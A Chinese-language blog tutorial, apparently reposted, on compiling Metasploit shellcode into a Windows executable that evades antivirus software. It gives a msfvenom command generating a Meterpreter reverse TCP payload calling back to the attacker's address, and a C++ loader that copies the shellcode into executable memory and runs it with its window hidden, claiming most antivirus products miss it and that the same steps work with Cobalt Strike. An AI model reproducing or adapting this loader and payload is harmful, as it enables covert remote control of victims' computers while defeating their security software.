免杀 编译shellcode进行绕过杀软操作!

环境安装

  • Vs 2017
  • windows 2008
  • kali

实操演示

打开 kali 下的 msf,然后生成 shellcode

msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f c > shellcode.c

然后将生成的文件打开,复制下图所示位置的代码
c#.png

然后打开 vs2017,新建项目→Visual C++ → 新建控制台应用程序

c#1.png

然后把 shellcode 复制到下面的代码里

    // MSF.cpp : 此文件包含 "main" 函数。程序执行将在此处开始并结束。
    //

    #include "pch.h"
    #include <iostream>
    #include "stdio.h"
    #include "Windows.h"

    #pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"")                        //去除窗口
    //步骤b所在桌面产生的 shellcode.c的内容;
    unsigned char shellcode[] =


    void main()

    {
        //ShellExecute(NULL, _T("open"), _T("explorer.exe"), _T("https://www.baiud.com"), NULL, SW_SHOW);
        LPVOID Memory = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
        memcpy(Memory, shellcode, sizeof(shellcode));
        ((void(*)())Memory)();
    }

再把这个代码全选复制到编辑器的代码框里
c#3.png
然后项目里右键属性 → C/C++ → 代码生成 → 运行库
c#4.png
保存之后,重新生成解决方案,就会生成一个 exe,这个 exe 运行即可上线
c#5.png
然后正常上线,此方法能上线大部分杀软!
c#6.png
查杀网也只有几个显示有毒,其中就包括 360
c#7.png

查杀地址:http://r.virscan.org/language/zh-cn/report/dc322aacd4209d2a3366c9fb74a3442b

如果要用 CS 上线,在生成 payload 设置如下图,后面操作是一样的

c#8.png

这里的方法可能会过期、但是手法和思路可以借鉴使用来进行对抗杀软!

转载自心灵鸡汤君:https://www.xljtj.com/archives/c-shellcode.html

本文经授权后发布,本文观点不代表立场,转载请联系原作者。
-- 展开阅读全文 --
Map Function
« 上一篇 05-02
Go语言实现MSF免杀上线、思路可转换自己生成马进行绕过免杀!
下一篇 » 05-03

发表评论